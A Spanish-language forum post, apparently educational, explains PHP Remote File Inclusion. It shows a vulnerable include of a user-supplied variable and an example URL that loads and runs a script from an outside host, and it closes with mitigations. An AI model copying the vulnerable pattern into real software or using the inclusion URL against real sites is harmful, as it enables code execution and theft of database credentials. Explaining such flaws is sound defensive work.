Creo que aquí tampoco sobra hablar sobre el conocido fallo de programación RFI (Remote File Inclusion):
Pongo un ejemplo, una en la que se accede a las secciones con un include (index.php?destino=...):
<?
include($destino.'.php'); //podría ser también .htm, sin exension...
?>
Con ese código, cualquiera podría ejecutar un script en esa página, solo tendría que poner lo siguiente:
index.php?destino=Http://web.com/script
(el script tendría que tener, en este caso, extension .php)
Y dependiendo de la seguridad de la web, con el script podría desde ver un listado de los archivos, hasta averiguar los datos para entrar en la base de datos...
Para solucionarlo, hay muchas formas, entre otras, no usar includes con variables o poner en Off la propiedad allow_url_fopen en el archivo php.ini.
Espero que sirva de algo esta aportación
.
Salu2.